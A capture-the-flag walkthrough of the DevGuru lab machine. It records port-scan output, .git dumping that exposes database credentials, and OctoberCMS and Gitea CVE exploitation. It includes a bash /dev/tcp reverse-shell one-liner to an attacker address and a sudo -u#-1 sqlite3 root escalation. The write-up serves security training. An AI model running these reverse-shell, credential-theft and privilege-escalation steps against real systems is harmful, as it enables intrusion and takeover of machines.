PORT SCAN
┌──(kali㉿kali)-[~]
└─$ sudo rustscan -a devguru.local -- -sV -O -A -sC
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Nmap? More like slowmap.
[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.68.209:22
Open 192.168.68.209:80
Open 192.168.68.209:8585
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -sV -O -A -sC" on ip 192.168.68.209
Depending on the complexity of the script, results may take some time to appear.
Warning: Hit PCRE_ERROR_MATCHLIMIT when probing for service http with the regex '^HTTP/1\.0 404 Not Found\r\n(?:[^<]+|<(?!/head>))*?<style>\nbody \{ background-color: #fcfcfc; color: #3333
33; margin: 0; padding:0; \}\nh1 \{ font-size: 1\.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; \}\nh1, p
\{ padding-left: 10px; \}\ncode\.url \{ background-color: #eeeeee; font-family:monospace; padding:0 2px;\}\n</style>'
Warning: Hit PCRE_ERROR_MATCHLIMIT when probing for service http with the regex '^HTTP/1\.0 404 Not Found\r\n(?:[^<]+|<(?!/head>))*?<style>\nbody \{ background-color: #ffffff; color: #0000
00; \}\nh1 \{ font-family: sans-serif; font-size: 150%; background-color: #9999cc; font-weight: bold; color: #000000; margin-top: 0;\}\n</style>'
Warning: Hit PCRE_ERROR_MATCHLIMIT when probing for service http with the regex '^HTTP/1\.0 404 Not Found\r\n(?:[^<]+|<(?!/head>))*?<style>\nbody \{ background-color: #fcfcfc; color: #3333
33; margin: 0; padding:0; \}\nh1 \{ font-size: 1\.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; \}\nh1, p
\{ padding-left: 10px; \}\ncode\.url \{ background-color: #eeeeee; font-family:monospace; padding:0 2px;\}\n</style>'
Warning: Hit PCRE_ERROR_MATCHLIMIT when probing for service http with the regex '^HTTP/1\.0 404 Not Found\r\n(?:[^<]+|<(?!/head>))*?<style>\nbody \{ background-color: #ffffff; color: #0000
00; \}\nh1 \{ font-family: sans-serif; font-size: 150%; background-color: #9999cc; font-weight: bold; color: #000000; margin-top: 0;\}\n</style>'
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-16 00:38 CST
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 00:38
Completed NSE at 00:38, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 00:38
Completed NSE at 00:38, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 00:38
Completed NSE at 00:38, 0.00s elapsed
Initiating ARP Ping Scan at 00:38
Scanning 192.168.68.209 [1 port]
Completed ARP Ping Scan at 00:38, 0.04s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 00:38
Scanning devguru.local (192.168.68.209) [3 ports]
Discovered open port 80/tcp on 192.168.68.209
Discovered open port 22/tcp on 192.168.68.209
Discovered open port 8585/tcp on 192.168.68.209
Completed SYN Stealth Scan at 00:38, 0.02s elapsed (3 total ports)
Initiating Service scan at 00:38
Scanning 3 services on devguru.local (192.168.68.209)
Stats: 0:01:21 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 66.67% done; ETC: 00:40 (0:00:41 remaining)
Completed Service scan at 00:39, 86.39s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against devguru.local (192.168.68.209)
NSE: Script scanning 192.168.68.209.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 00:39
Completed NSE at 00:39, 0.53s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 00:39
Completed NSE at 00:39, 1.01s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 00:39
Completed NSE at 00:39, 0.00s elapsed
Nmap scan report for devguru.local (192.168.68.209)
Host is up, received arp-response (0.00022s latency).
Scanned at 2024-01-16 00:38:04 CST for 89s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 2a:46:e8:2b:01:ff:57:58:7a:5f:25:a4:d6:f2:89:8e (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC+lft/kQdC+3L4qMerPmpboe5GOrB60x+QU0R7hjmxY+9bNqST//1+Oa7ycVotqdlk4EtxgnqE2B4mRTNb16mITv/Y8UfsCqYAuy3C8lV9HzG6zgsXgnAhvpMmY31fZqz+dKamnp1W1o+scbnzRN
qr/fE1+Yz7Fcu4JvAJ/4NLQS9CHmZh+N12OyF8eVOQmjPeRVHR8BiptinM+EXis4xpOQiuZoEBPkyqhXcBW65CAXlkjuuJ6KpJ7Y3Gbse38L6LKGFs8Hl5k1jbuTxDg8CT+rzzy6on8niDDfcVwHTvZ1JqlUpzjaGifDD8gV60ebRa5/36ORI+ed6G9v
1HOW3r
| 256 08:79:93:9c:e3:b4:a4:be:80:ad:61:9d:d3:88:d2:84 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNQzBnXE0Ezf7XOzh2KxdMAetOtoTEmfiCh2OSwjnIpAzd1osDr7UsuNt/5m45OgfWVAcVnu3ECEuQZ03P4VxkU=
| 256 9c:f9:88:d4:33:77:06:4e:d9:7c:39:17:3e:07:9c:bd (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINjsvy3HYYZxlENx0Fmval1Ax8ApGBKu6wf5sjK8xuv2
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Corp - DevGuru
|_http-generator: DevGuru
| http-git:
| 192.168.68.209:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
| Last commit message: first commit
| Remotes:
| http://devguru.local:8585/frank/devguru-website.git
|_ Project type: PHP application (guessed from .gitignore)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
8585/tcp open unknown syn-ack ttl 64
| fingerprint-strings:
| GenericLines:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 200 OK
| Content-Type: text/html; charset=UTF-8
| Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
| Set-Cookie: i_like_gitea=3ef4c57e2ce5d03b; Path=/; HttpOnly
| Set-Cookie: _csrf=x_ZleYXUfeF2AQwFaksOzr1os-A6MTcwNTMzNjY5MDgzNzQ1NDY5OA; Path=/; Expires=Tue, 16 Jan 2024 16:38:10 GMT; HttpOnly
| X-Frame-Options: SAMEORIGIN
| Date: Mon, 15 Jan 2024 16:38:10 GMT
| <!DOCTYPE html>
| <html lang="en-US" class="theme-">
| <head data-suburl="">
| <meta charset="utf-8">
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <meta http-equiv="x-ua-compatible" content="ie=edge">
| <title> Gitea: Git with a cup of tea </title>
| <link rel="manifest" href="/manifest.json" crossorigin="use-credentials">
| <meta name="theme-color" content="#6cc644">
| <meta name="author" content="Gitea - Git with a cup of tea" />
| <meta name="description" content="Gitea (Git with a cup of tea) is a painless
| HTTPOptions:
| HTTP/1.0 404 Not Found
| Content-Type: text/html; charset=UTF-8
| Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
| Set-Cookie: i_like_gitea=1a9e8835f6ca7e2a; Path=/; HttpOnly
| Set-Cookie: _csrf=y2bCvV6g4oUEOhbyGyNNNVJAlL86MTcwNTMzNjY5MDg4NzcxNjU0MQ; Path=/; Expires=Tue, 16 Jan 2024 16:38:10 GMT; HttpOnly
| X-Frame-Options: SAMEORIGIN
| Date: Mon, 15 Jan 2024 16:38:10 GMT
| <!DOCTYPE html>
| <html lang="en-US" class="theme-">
| <head data-suburl="">
| <meta charset="utf-8">
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <meta http-equiv="x-ua-compatible" content="ie=edge">
| <title>Page Not Found - Gitea: Git with a cup of tea </title>
| <link rel="manifest" href="/manifest.json" crossorigin="use-credentials">
| <meta name="theme-color" content="#6cc644">
| <meta name="author" content="Gitea - Git with a cup of tea" />
|_ <meta name="description" content="Gitea (Git with a c
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8585-TCP:V=7.94SVN%I=7%D=1/16%Time=65A55F72%P=x86_64-pc-linux-gnu%r
SF:(GenericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x
SF:20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Ba
SF:d\x20Request")%r(GetRequest,2A00,"HTTP/1\.0\x20200\x20OK\r\nContent-Typ
SF:e:\x20text/html;\x20charset=UTF-8\r\nSet-Cookie:\x20lang=en-US;\x20Path
SF:=/;\x20Max-Age=2147483647\r\nSet-Cookie:\x20i_like_gitea=3ef4c57e2ce5d0
SF:3b;\x20Path=/;\x20HttpOnly\r\nSet-Cookie:\x20_csrf=x_ZleYXUfeF2AQwFaksO
SF:zr1os-A6MTcwNTMzNjY5MDgzNzQ1NDY5OA;\x20Path=/;\x20Expires=Tue,\x2016\x2
SF:0Jan\x202024\x2016:38:10\x20GMT;\x20HttpOnly\r\nX-Frame-Options:\x20SAM
SF:EORIGIN\r\nDate:\x20Mon,\x2015\x20Jan\x202024\x2016:38:10\x20GMT\r\n\r\
SF:n<!DOCTYPE\x20html>\n<html\x20lang=\"en-US\"\x20class=\"theme-\">\n<hea
SF:d\x20data-suburl=\"\">\n\t<meta\x20charset=\"utf-8\">\n\t<meta\x20name=
SF:\"viewport\"\x20content=\"width=device-width,\x20initial-scale=1\">\n\t
SF:<meta\x20http-equiv=\"x-ua-compatible\"\x20content=\"ie=edge\">\n\t<tit
SF:le>\x20Gitea:\x20Git\x20with\x20a\x20cup\x20of\x20tea\x20</title>\n\t<l
SF:ink\x20rel=\"manifest\"\x20href=\"/manifest\.json\"\x20crossorigin=\"us
SF:e-credentials\">\n\t<meta\x20name=\"theme-color\"\x20content=\"#6cc644\
SF:">\n\t<meta\x20name=\"author\"\x20content=\"Gitea\x20-\x20Git\x20with\x
SF:20a\x20cup\x20of\x20tea\"\x20/>\n\t<meta\x20name=\"description\"\x20con
SF:tent=\"Gitea\x20\(Git\x20with\x20a\x20cup\x20of\x20tea\)\x20is\x20a\x20
SF:painless")%r(HTTPOptions,212A,"HTTP/1\.0\x20404\x20Not\x20Found\r\nCont
SF:ent-Type:\x20text/html;\x20charset=UTF-8\r\nSet-Cookie:\x20lang=en-US;\
SF:x20Path=/;\x20Max-Age=2147483647\r\nSet-Cookie:\x20i_like_gitea=1a9e883
SF:5f6ca7e2a;\x20Path=/;\x20HttpOnly\r\nSet-Cookie:\x20_csrf=y2bCvV6g4oUEO
SF:hbyGyNNNVJAlL86MTcwNTMzNjY5MDg4NzcxNjU0MQ;\x20Path=/;\x20Expires=Tue,\x
SF:2016\x20Jan\x202024\x2016:38:10\x20GMT;\x20HttpOnly\r\nX-Frame-Options:
SF:\x20SAMEORIGIN\r\nDate:\x20Mon,\x2015\x20Jan\x202024\x2016:38:10\x20GMT
SF:\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang=\"en-US\"\x20class=\"theme-\"
SF:>\n<head\x20data-suburl=\"\">\n\t<meta\x20charset=\"utf-8\">\n\t<meta\x
SF:20name=\"viewport\"\x20content=\"width=device-width,\x20initial-scale=1
SF:\">\n\t<meta\x20http-equiv=\"x-ua-compatible\"\x20content=\"ie=edge\">\
SF:n\t<title>Page\x20Not\x20Found\x20-\x20\x20Gitea:\x20Git\x20with\x20a\x
SF:20cup\x20of\x20tea\x20</title>\n\t<link\x20rel=\"manifest\"\x20href=\"/
SF:manifest\.json\"\x20crossorigin=\"use-credentials\">\n\t<meta\x20name=\
SF:"theme-color\"\x20content=\"#6cc644\">\n\t<meta\x20name=\"author\"\x20c
SF:ontent=\"Gitea\x20-\x20Git\x20with\x20a\x20cup\x20of\x20tea\"\x20/>\n\t
SF:<meta\x20name=\"description\"\x20content=\"Gitea\x20\(Git\x20with\x20a\
SF:x20c");
MAC Address: 00:0C:29:3C:66:C2 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=1/16%OT=22%CT=%CU=39877%PV=Y%DS=1%DC=D%G=N%M=000C29
OS:%TM=65A55FC5%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10A%TI=Z%CI=Z%II
OS:=I%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7
OS:%O5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%
OS:W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S
OS:=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%R
OS:D=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=
OS:0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U
OS:1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DF
OS:I=N%T=40%CD=S)
Uptime guess: 48.523 days (since Tue Nov 28 12:05:46 2023)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.22 ms devguru.local (192.168.68.209)
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 00:39
Completed NSE at 00:39, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 00:39
Completed NSE at 00:39, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 00:39
Completed NSE at 00:39, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 89.65 seconds
Raw packets sent: 26 (1.938KB) | Rcvd: 18 (1.410KB)
FOOT
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Corp - DevGuru
|_http-generator: DevGuru
| http-git:
| 192.168.68.209:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
| Last commit message: first commit
| Remotes:
| http://devguru.local:8585/frank/devguru-website.git
|_ Project type: PHP application (guessed from .gitignore)
There is a .git folder,Let’s try to donwload it and find something interesting.
But when we use wget -r
,there is an error:
kali@kali:~$ wget -r http://devguru.local/.git
--2024-01-16 00:53:28-- http://devguru.local/.git
Resolving devguru.local (devguru.local)... 192.168.68.209
Connecting to devguru.local (devguru.local)|192.168.68.209|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://devguru.local/.git/ [following]
--2024-01-16 00:53:28-- http://devguru.local/.git/
Reusing existing connection to devguru.local:80.
HTTP request sent, awaiting response... 404 Not Found
2024-01-16 00:53:29 ERROR 404: Not Found.
the reason is that the server does not allow dirctory listing.
So,Let’s try git-dumper
:
~/opt/pyenvenv/bin/git-dumper http://192.168.68.209:80/.git/ ~/Desktop/devguru
and then we got all files:
kali@kali:~/Desktop/devguru$ ls -la
total 416
drwxr-xr-x 9 kali kali 4096 Jan 16 00:56 .
drwxr-xr-x 18 kali kali 4096 Jan 16 00:56 ..
-rw-r--r-- 1 kali kali 362514 Jan 16 00:56 adminer.php
-rw-r--r-- 1 kali kali 1640 Jan 16 00:56 artisan
drwxr-xr-x 2 kali kali 4096 Jan 16 00:56 bootstrap
drwxr-xr-x 2 kali kali 4096 Jan 16 00:56 config
drwxr-xr-x 7 kali kali 4096 Jan 16 00:56 .git
-rw-r--r-- 1 kali kali 413 Jan 16 00:56 .gitignore
-rw-r--r-- 1 kali kali 1678 Jan 16 00:56 .htaccess
-rw-r--r-- 1 kali kali 1173 Jan 16 00:56 index.php
drwxr-xr-x 5 kali kali 4096 Jan 16 00:56 modules
drwxr-xr-x 3 kali kali 4096 Jan 16 00:56 plugins
-rw-r--r-- 1 kali kali 1518 Jan 16 00:56 README.md
-rw-r--r-- 1 kali kali 551 Jan 16 00:56 server.php
drwxr-xr-x 6 kali kali 4096 Jan 16 00:56 storage
drwxr-xr-x 4 kali kali 4096 Jan 16 00:56 themes
Ok,Let’s check them now.
we find something in config/database.php:
'mysql' => [
'driver' => 'mysql',
'engine' => 'InnoDB',
'host' => 'localhost',
'port' => 3306,
'database' => 'octoberdb',
'username' => 'october',
'password' => 'SQ66EBYx4GT3byXH',
'charset' => 'utf8mb4',
'collation' => 'utf8mb4_unicode_ci',
'prefix' => '',
'varcharmax' => 191,
],
By using Gobuster,we found Something:
└─$ gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://devguru.local -x php,txt,bak,old -t 20
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://devguru.local
[+] Method: GET
[+] Threads: 20
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,txt,bak,old
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess (Status: 200) [Size: 1678]
/0 (Status: 200) [Size: 12669]
/About (Status: 200) [Size: 18661]
/Services (Status: 200) [Size: 10032]
/about (Status: 200) [Size: 18661]
/adminer.php (Status: 200) [Size: 4228]
/backend (Status: 302) [Size: 410] [--> http://devguru.local/backend/backend/auth]
/adminer.php:
We find a cred here with a crypted password:$2y$10$bp5wBfbAN6lMYT27pJMomOGutDF2RKZKYZITAupZ3x8eAaYgN6EKK
Let’s analyse it:
It’s very hard to decrypt,but we can change it using mysql:
![[Pasted image 202401
Now,Let’s try log in.
cve-2022-21705:https://cyllective.com/blog/post/octobercms-cve-2022-21705
try use a base64 encoded shell:
kali@kali:~$ echo 'bash -i >& /dev/tcp/192.168.68.107/443 0>&1' | base64
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjY4LjEwNy80NDMgMD4mMQo=
we got it:
we find something interesting in /var/backups:
www-data@devguru:/var/lib$ cd /var/backups/
www-data@devguru:/var/backups$ ls
app.ini.bak apt.extended_states.0 apt.extended_states.1.gz
www-data@devguru:/var/backups$ grep -irn pass /var/backups/app.ini.bak
407:; Use PASSWD = `your password` for quoting if you use special characters in the password.
408:PASSWD = UfFPTF8C8jjxVF2m
531:; The minimum password length for new Users
532:MIN_PASSWORD_LENGTH = 6
544:; Comma separated list of character classes required to pass minimum complexity.
547:PASSWORD_COMPLEXITY = off
548:; Password Hash algorithm, either "argon2", "pbkdf2", "scrypt" or "bcrypt"
549:PASSWORD_HASH_ALGO = pbkdf2
552:; Validate against https://haveibeenpwned.com/Passwords to see if a password has been exposed
553:PASSWORD_CHECK_PWN = false
594:; Time limit to perform the reset of a forgotten password
595:RESET_PASSWD_CODE_LIVE_MINUTES = 180
609:; This setting enables gitea to be signed in with HTTP BASIC Authentication using the user's password
610:; If you set this to false you will not be able to access the tokens endpoints on the API with your password
716:; Mailer user name and password
719:; Use PASSWD = `your password` for quoting if you use special characters in the password.
720:PASSWD =
740:; redis: network=tcp,addr=:6379,password=macaron,db=0,pool_size=100,idle_timeout=180
763:; redis: network=tcp,addr=:6379,password=macaron,db=0,pool_size=100,idle_timeout=180
764:; mysql: go-sql-driver/mysql dsn config string, e.g. `root:password@/session_table`
910:; Mailer user name and password
912:; Use PASSWD = `your password` for quoting if you use special characters in the password.
913:PASSWD =
1165:; Don't pass the file on STDIN, pass the filename as argument instead.
1180:; If there is a password of redis, use `addrs=127.0.0.1:6379 password=123 db=0`.
[database]
; Database to use. Either "mysql", "postgres", "mssql" or "sqlite3".
DB_TYPE = mysql
HOST = 127.0.0.1:3306
NAME = gitea
USER = gitea
; Use PASSWD = `your password` for quoting if you use special characters in the password.
PASSWD = UfFPTF8C8jjxVF2m
; For Postgres, schema to use if different from "public". The schema must exist beforehand,
; the user must have creation privileges on it, and the user search path must be set
Here is a new cred for mysql.Let’s try to use it:
By checking the docs:
Let’s change the hash_algo to bcrypt,and use admin
as new password:
We notice that the version of gitea is 1.12.5,
CVE-2020-14144:https://podalirius.net/en/articles/exploiting-cve-2020-14144-gitea-authenticated-remote-code-execution/
upload the hook,and than upload a new file:
then we get a shell:
ROOT
Check sudo version&config:
sudo 1.8.27 - Security Bypass:https://www.exploit-db.com/exploits/47502
sqlite3 sudo PE:https://gtfobins.github.io/gtfobins/sqlite3/
Let’s try sudo -u#-1 sqlite3 /dev/null '.shell /bin/sh'
: